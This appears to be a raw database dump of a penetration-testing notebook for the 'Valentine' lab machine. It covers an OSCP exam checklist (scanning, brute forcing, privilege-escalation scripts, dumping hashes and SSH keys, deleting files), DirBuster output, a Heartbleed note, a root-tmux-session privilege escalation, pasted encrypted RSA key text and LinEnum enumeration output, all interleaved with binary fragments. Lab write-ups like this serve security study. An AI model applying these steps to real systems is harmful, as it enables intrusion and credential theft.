SQLite format 3@ h-  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node  h  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xAu/Pm'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"Aq Ĝk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*Auk!' 
10.10.10.Xcustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2&x)'  Dirb\DirBustercustom-colors$A?&xAu/Pm'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"Aq Ĝk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXl#'  Enumerationcustom-colors*AuB#/'  Enumeration$ nmap -sC -sV -Pn -p- -oA ./Valentin_ ck '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2*)i'  Dirb\DirBuster$ dirbuster Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true Starting OWASP DirBuster 1.0-RC1 Starting dir/file list based brute forcing Dir found: / - 200 Dir found: /index/ - 200 Dir found: /cgi-bin/ - 403 File found: /index.php - 200 Dir found: /icons/ - 403 Dir found: /doc/ - 403 Dir found: /icons/small/ - 403 Dir found: /dev/ - 200 File found: /dev/hype_key - 200 File found: /dev/notes.txt - 200 custom-colors$A?&xA hrn )'  Other Servicescustom-colorsXA[Ad Us dsv)' 8)'  Script Results ########################q/'  Post Exploitationcustom-colors*AIZnn]%y'  ExploitationService l'   Othercustom-colorsA[EϯA[Tci '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DN%K'  ExploitationService Exploited: OpenSSL Heartbleed Vulnerability Type: Memory b #/]'  Running ProcessesWriteable Files\Directories Directory List custom-colors$A[3QZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4* OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg ^^Qg'  Goodiescustom-colorsVA?& c!+e'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAuoف)c'  Scheduled JobsScheduled Taskscustom-colors$ANl FF@7+'   Priv EscalationService Exploited: TMUX Vulnerability Type: 
Leftover TMUX session from a root user Exploit POC: man tmux Description: Resuming a named TMUX session Discovery of Vulnerability LnEnum output root 1005 0.0 0.1 26416 1676 ? Ss 14:11 0:01 /usr/bin/tmux -S /.devs/dev_sess Exploit Code Used tmux -S /.devs/dev_sess Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsA .Rich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ.,   t/'  Proof\Flags\Otherroot@Valentine:/home/hype/Desktop# whoami root root@Valentine:/home/hype/Desktop# hostname Valentine root@Valentine:/home/hype/Desktop# ifconfig eth0 Link encap:Ethernet HWaddr 00:50:56:b9:d0:09 inet addr:10.10.10.79 Bcast:10.10.10.255 Mask:255.255.255.0 inet6 addr: dead:beef::b881:fd57:25a3:d78f/64 Scope:Global inet6 addr: dead:beef::250:56ff:feb9:d009/64 Scope:Global inet6 addrZ /9'  Software VersionsSoftware Versions Potential Exploitscustom-colorsANlH{x;' 10.10.10.79 - 
Valentinecustom-colorsA4h  ' Log Bookcustom-colors(AI^NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ +wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe 2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP 09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3 -----END RSA PRIVATE KEY-----custom-colorsA Ey&A Q ^"1K'  #hype_key_converted-----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46 DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R 5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6 0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5 XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0################################# # Local Linux Enumeration & Privilege Escalation Script # 
######################################################### # www.rebootuser.com # version 0.982 [-] Debug Info [+] Thorough tests = Enabled Scan started at: Thu Aug 27 15:12:21 PDT 2020  ### SYSTEM ############################################## [-] Kernel information: Linux Valentine 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux [-] Kernel information (continued): Linux version 3.2.0-23-generic (buildd@crested) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu4) ) #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 [-] Specific release information: DISTRIB_ID=Ubuntu DISTRIB_RELEASE=12.04 DISTRIB_CODENAME=precise DISTRIB_DESCRIPTION=&quot;Ubuntu 12.04 LTS" [-] Hostname: Valentine ### USER/GROUP ########################################## [-] Current user/group info: uid=1000(hype) gid=1000(hype) groups=1000(hype),24(cdrom),30(dip),46(plugdev),124(sambashare) [-] Users that have previously logged onto the system: Username Port From Latest root tty1 Fri Feb 16 14:38:30 -0800 2018 hype pts/0 10.10.14.7 Thu Aug 27 15:07:49 -0700 2020 [-] Who else is logged on: 15:12:21 up 1:01, 1 user, load average: 0.34, 0.17, 0.15 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT hype pts/0 10.10.14.7 15:07 2.00s 0.26s 0.00s /bin/bash ./Lin [-] Group memberships: uid=0(root) gid=0(root) groups=0(root) uid=1(daemon) gid=1(daemon) groups=1(daemon) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=41(gnats) gid=41(gnats) 
groups=41(gnats) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=100(libuuid) gid=101(libuuid) groups=101(libuuid) uid=101(syslog) gid=103(syslog) groups=103(syslog) uid=102(messagebus) gid=105(messagebus) groups=105(messagebus) uid=103(colord) gid=108(colord) groups=108(colord) uid=104(lightdm) gid=111(lightdm) groups=111(lightdm) uid=105(whoopsie) gid=114(whoopsie) groups=114(whoopsie) uid=106(avahi-autoipd) gid=117(avahi-autoipd) groups=117(avahi-autoipd) uid=107(avahi) gid=118(avahi) groups=118(avahi) uid=108(usbmux) gid=46(plugdev) groups=46(plugdev) uid=109(kernoops) gid=65534(nogroup) groups=65534(nogroup) uid=110(pulse) gid=119(pulse) groups=119(pulse),29(audio) uid=111(rtkit) gid=122(rtkit) groups=122(rtkit) uid=112(speech-dispatcher) gid=29(audio) groups=29(audio) uid=113(hplip) gid=7(lp) groups=7(lp) uid=114(saned) gid=123(saned) groups=123(saned) uid=1000(hype) gid=1000(hype) groups=1000(hype),24(cdrom),30(dip),46(plugdev),124(sambashare) uid=115(sshd) gid=65534(nogroup) groups=65534(nogroup) [-] Contents of /etc/passwd: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false colord:x:103:108:colord colour management daemon,,,:/var/lib/colord:/bin/false 
lightdm:x:104:111:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:105:114::/nonexistent:/bin/false avahi-autoipd:x:106:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:107:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false usbmux:x:108:46:usbmux daemon,,,:/home/usbmux:/bin/false kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:111:122:RealtimeKit,,,:/proc:/bin/false speech-dispatcher:x:112:29:Speech Dispatcher, ,,:/var/run/speech-dispatcher:/bin/sh hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false saned:x:114:123::/home/saned:/bin/false hype:x:1000:1000:Hemorrhage,,,:/home/hype:/bin/bash sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin [-] Super user account(s): root [-] Are permissions on /home directories lax: total 12K drwxr-xr-x 3 root root 4.0K Dec 11 2017 . drwxr-xr-x 26 root root 4.0K Feb 6 2018 .. drwxr-xr-x 21 hype hype 4.0K Feb 5 2018 hype [-] Files owned by our user: -rw-rw-r-- 1 hype hype 153356 Dec 12 2017 /var/www/omg.jpg -rw-r--r-- 1 hype hype 675 Dec 11 2017 /home/hype/.profile -rw------- 1 hype hype 207 Dec 11 2017 /home/hype/.gnome2/keyrings/user.keystore -rw------- 1 hype hype 105 Dec 11 2017 /home/hype/.gnome2/keyrings/login.keyring -rw-rw-r-- 1 hype hype 104 Dec 11 2017 /home/hype/.fontconfig/cabbd14511b9e8a55e92af97fb3a0461-le64.cache-3 -rw-rw-r-- 1 hype hype 8832 Dec 11 2017 /home/hype/.fontconfig/e13b20fdb08344e0e664864c!c2ede53d-le64.cache-3 -rw-rw-r-- 1 hype hype 12872 Dec 11 2017 /home/hype/.fontconfig/7ef2298fde41cc6eeb7af42e48b7d293-le64.cache-3 -rw------- 1 hype hype 131 Feb 16 2018 /home/hype/.bash_history -rw-r--r-- 1 hype hype 220 Dec 11 2017 /home/hype/.bash_logout -rw-rw-r-- 1 hype hype 371 Dec 11 2017 /home/hype/.cache/unity-lens-video/videos.db -rw-rw-r-- 1 hype hype 3683 Dec 11 2017 /home/hype/.cache/update-manager-core/meta-release-lts -rw-rw-r-- 1 hype hype 541612 Dec 11 2017 
/home/hype/.cache/wallpaper/0_5_1700_927_792beab7550410d531e55f95b449f135 -rw-r--r-- 1 hype hype 3072 Dec 11 2017 /home/hype/.cache/indicator-appmenu/hud-usage-log.sqlite -rw-rw-r-- 1 hype hype 1978 Dec 11 2017 /home/hype/.cache/unity/migration_script.log -rw------- 1 hype hype 1 Dec 11 2017 /home/hype/.cache/dconf/user -rw-r--r-- 1 hype hype 0 Dec 11 2017 /home/hype/.cache/motd.legal-displayed -rw-rw-r-- 1 hype hype 71 Dec 11 2017 /home/hype/.cache/indicators/messages/seen-db.keyfile -rw-r--r-- 1 hype hype 16384 Dec 11 20"17 /home/hype/.cache/event-sound-cache.tdb.c9052f1b76300a5447f46cc700000004.x86_64-pc-linux-gnu -rw-r--r-- 1 hype hype 26 Dec 11 2017 /home/hype/.dmrc -rw------- 1 hype hype 0 Dec 11 2017 /home/hype/.Xauthority -rw-rw-r-- 1 hype hype 5 Dec 11 2017 /home/hype/.config/user-dirs.locale -rw------- 1 hype hype 632 Dec 11 2017 /home/hype/.config/user-dirs.dirs -rw-rw-r-- 1 hype hype 1152 Dec 11 2017 /home/hype/.config/dconf/user -rw-rw-r-- 1 hype hype 97 Dec 11 2017 /home/hype/.config/nautilus/desktop-metadata -rw-rw-r-- 1 hype hype 3031 Dec 11 2017 /home/hype/.config/Trolltech.conf -rw------- 1 hype hype 1024 Dec 11 2017 /home/hype/.local/share/zeitgeist/activity.sqlite -rw------- 1 hype hype 281944 Dec 11 2017 /home/hype/.local/share/zeitgeist/activity.sqlite-wal -rw------- 1 hype hype 32768 Dec 11 2017 /home/hype/.local/share/zeitgeist/activity.sqlite-shm -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/position.baseA -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hy#pe/.local/share/zeitgeist/fts.index/termlist.baseB -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/record.DB -rw-rw-r-- 1 hype hype 28 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/iamchert -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/position.DB -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.DB -rw-rw-r-- 1 hype hype 0 Dec 
11 2017 /home/hype/.local/share/zeitgeist/fts.index/flintlock -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/position.baseB -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.baseA -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.baseA -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.DB -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/record.baseB -rw-r$w-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/record.baseA -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.baseB -rw-r--r-- 1 hype hype 19456 Dec 11 2017 /home/hype/.local/share/webkit/icondatabase/WebpageIcons.db -rw-rw-r-- 1 hype hype 0 Dec 11 2017 /home/hype/.local/share/.converted-launchers -rw------- 1 hype hype 38 Dec 11 2017 /home/hype/.local/share/telepathy/mission-control/accounts-goa.cfg -rw-rw-r-- 1 hype hype 835 Dec 11 2017 /home/hype/.local/share/gsettings-data-convert -rw------- 1 hype hype 1766 Dec 13 2017 /home/hype/.ssh/id_rsa -rw------- 1 hype hype 222 Dec 13 2017 /home/hype/.ssh/known_hosts -rw-r--r-- 1 hype hype 397 Dec 13 2017 /home/hype/.ssh/id_rsa.pub -rw------- 1 hype hype 397 Dec 13 2017 /home/hype/.ssh/authorized_keys -rw------- 1 hype hype 115 Dec 11 2017 /home/hype/.gconf/apps/update-notifier/%gconf.xml -rw------- 1 hype hype 0 Dec 11 2017 /home/hype/.gconf/apps/%gconf.xml -rw------- 1 hype hy%pe 384 Dec 11 2017 /home/hype/.gconf/apps/update-manager/%gconf.xml -rw------- 1 hype hype 102 Dec 11 2017 /home/hype/.gconf/apps/nm-applet/%gconf.xml -rw------- 1 hype hype 0 Dec 11 2017 /home/hype/.gconf/apps/gnome-terminal/%gconf.xml -rw------- 1 hype hype 904 Dec 11 2017 /home/hype/.gconf/apps/gnome-terminal/profiles/Default/%gconf.xml -rw------- 1 hype hype 0 Dec 11 2017 /home/hype/.gconf/apps/gnome-terminal/profiles/%gconf.xml 
-rw------- 1 hype hype 21 Dec 11 2017 /home/hype/.mission-control/accounts/accounts.cfg -rw------- 1 hype hype 12173 Dec 11 2017 /home/hype/.xsession-errors -rw------- 1 hype hype 636 Dec 11 2017 /home/hype/.ICEauthority -rw-r--r-- 1 hype hype 696 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-card-database.tdb -rw-r--r-- 1 hype hype 12288 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-device-volumes.tdb -rw-r--r-- 1 hype hype 10 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-default-sink -rw-r--r-- 1 hype hype 18 Dec &11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-default-source -rw-r--r-- 1 hype hype 696 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-stream-volumes.tdb -rw-rw-r-- 1 hype hype 132 Dec 11 2017 /home/hype/.gtk-bookmarks -rw-rw-r-- 1 hype hype 5527 Aug 27 15:12 /home/hype/Desktop/output.txt -rwxrwxr-x 1 hype hype 46631 Jul 13 11:54 /home/hype/Desktop/LinEnum.sh -rw-rw-r-- 1 hype hype 33 Dec 13 2017 /home/hype/Desktop/user.txt -rw------- 1 hype hype 256 Dec 11 2017 /home/hype/.pulse-cookie -rw-rw-r-- 1 hype hype 463 Dec 11 2017 /home/hype/.dbus/session-bus/c9052f1b76300a5447f46cc700000004-0 -rw-r--r-- 1 hype hype 3486 Dec 11 2017 /home/hype/.bashrc -rw------- 1 hype hype 9659 Dec 11 2017 /home/hype/.xsession-errors.old [-] Hidden files: -rw-r--r-- 1 root root 2177 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/.conmakehash.cmd -rw-r--r-- 1 root root 3952 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/basic/.fixdep.cmd -rw-r--r-- '1 root root 104 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/mod/.elfconfig.h.cmd -rw-r--r-- 1 root root 4083 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/mod/.sumversion.o.cmd -rw-r--r-- 1 root root 2329 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/mod/.mk_elfconfig.cmd -rw-r--r-- 1 root root 1575 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/mod/.empty.o.cmd 
-rw-r--r-- 1 root root 3382 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/mod/.modpost.o.cmd -rw-r--r-- 1 root root 3068 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/mod/.file2alias.o.cmd -rw-r--r-- 1 root root 129 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/mod/.modpost.cmd -rw-r--r-- 1 root root 2657 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/selinux/mdp/.mdp.cmd -rw-r--r-- 1 root root 3057 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/selinux/genheaders/.genheaders.cmd -rw-r--r-- 1 root root 2317 Apr 10 (2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/genksyms/.parse.tab.o.cmd -rw-r--r-- 1 root root 2549 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/genksyms/.genksyms.o.cmd -rw-r--r-- 1 root root 3187 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/genksyms/.lex.lex.o.cmd -rw-r--r-- 1 root root 153 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/genksyms/.genksyms.cmd -rw-r--r-- 1 root root 2119 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/.kallsyms.cmd -rw-r--r-- 1 root root 110 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/kconfig/.conf.cmd -rw-r--r-- 1 root root 3101 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/kconfig/.conf.o.cmd -rw-r--r-- 1 root root 4501 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/kconfig/.zconf.tab.o.cmd -rw-r--r-- 1 root root 3018 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/.recordmcount.cmd -rw-r--r-- 1 root root 608 Apr 10 2012 /usr/src/linux-headers-3).2.0-23-generic/.missing-syscalls.d -rw-r--r-- 1 root root 140251 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/.config -rw-r--r-- 1 root root 39130 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/arch/x86/kernel/.asm-offsets.s.cmd -rw-r--r-- 1 root root 4854 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/kernel/.bounds.s.cmd -rw-r--r-- 1 root root 140290 Apr 10 2012 
/usr/src/linux-headers-3.2.0-23-generic/.config.old -rw-r--r-- 1 root root 7 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/basic/.gitignore -rw-r--r-- 1 root root 96 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/.gitignore -rw-r--r-- 1 root root 34 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/mod/.gitignore -rw-r--r-- 1 root root 21 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/selinux/mdp/.gitignore -rw-r--r-- 1 root root 11 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/selinux/genheaders/.gitignore -rw-r--r-- 1 root root 55 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/dtc/.gitig*nore -rw-r--r-- 1 root root 42 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/genksyms/.gitignore -rw-r--r-- 1 root root 178 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/kconfig/.gitignore -rw-r--r-- 1 root root 31 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/kconfig/lxdialog/.gitignore -rw-r--r-- 1 hype hype 675 Dec 11 2017 /home/hype/.profile -rw------- 1 hype hype 131 Feb 16 2018 /home/hype/.bash_history -rw-r--r-- 1 hype hype 220 Dec 11 2017 /home/hype/.bash_logout -rw-r--r-- 1 hype hype 26 Dec 11 2017 /home/hype/.dmrc -rw------- 1 hype hype 0 Dec 11 2017 /home/hype/.Xauthority -rw-rw-r-- 1 hype hype 0 Dec 11 2017 /home/hype/.local/share/.converted-launchers -rw-r--r-- 1 root root 39 Dec 13 2017 /home/hype/.tmux.conf -rw------- 1 hype hype 12173 Dec 11 2017 /home/hype/.xsession-errors -rw------- 1 hype hype 636 Dec 11 2017 /home/hype/.ICEauthority -rw-rw-r-- 1 hype hype 132 Dec 11 2017 /home/hype/.gtk-bookmarks -rw------- 1 hype hype 256 Dec 11 2017 /home/hype/.pulse-c+ookie -rw-r--r-- 1 hype hype 3486 Dec 11 2017 /home/hype/.bashrc -rw------- 1 hype hype 9659 Dec 11 2017 /home/hype/.xsession-errors.old -rw-r--r-- 1 root root 102 Apr 2 2012 /etc/cron.monthly/.placeholder -rw-r--r-- 1 root root 102 Apr 2 2012 /etc/cron.weekly/.placeholder -rw-r--r-- 1 root root 102 Apr 2 2012 /etc/cron.hourly/.placeholder -rw-r--r-- 1 root root 628 Dec 11 
2017 /etc/apparmor.d/cache/.features -rw-r--r-- 1 root root 102 Apr 2 2012 /etc/cron.daily/.placeholder -rw-r--r-- 1 root root 675 Apr 3 2012 /etc/skel/.profile -rw-r--r-- 1 root root 220 Apr 3 2012 /etc/skel/.bash_logout -rw-r--r-- 1 root root 3486 Apr 3 2012 /etc/skel/.bashrc -rw-r--r-- 1 root root 0 Feb 21 2012 /etc/sensors.d/.placeholder -rw-r--r-- 1 root root 0 Apr 25 2012 /etc/init.d/.legacy-bootordering -rw------- 1 root root 0 Apr 25 2012 /etc/.pwd.lock -rw-r--r-- 1 root root 102 Apr 2 2012 /etc/cron.d/.placeholder [-] World-readable files within /home: -rw-r--r-- 1 hype hype 675 Dec 11 2017, /home/hype/.profile -rw-rw-r-- 1 hype hype 104 Dec 11 2017 /home/hype/.fontconfig/cabbd14511b9e8a55e92af97fb3a0461-le64.cache-3 -rw-rw-r-- 1 hype hype 8832 Dec 11 2017 /home/hype/.fontconfig/e13b20fdb08344e0e664864cc2ede53d-le64.cache-3 -rw-rw-r-- 1 hype hype 12872 Dec 11 2017 /home/hype/.fontconfig/7ef2298fde41cc6eeb7af42e48b7d293-le64.cache-3 -rw-r--r-- 1 hype hype 220 Dec 11 2017 /home/hype/.bash_logout -rw-rw-r-- 1 hype hype 371 Dec 11 2017 /home/hype/.cache/unity-lens-video/videos.db -rw-rw-r-- 1 hype hype 3683 Dec 11 2017 /home/hype/.cache/update-manager-core/meta-release-lts -rw-rw-r-- 1 hype hype 541612 Dec 11 2017 /home/hype/.cache/wallpaper/0_5_1700_927_792beab7550410d531e55f95b449f135 -rw-r--r-- 1 hype hype 3072 Dec 11 2017 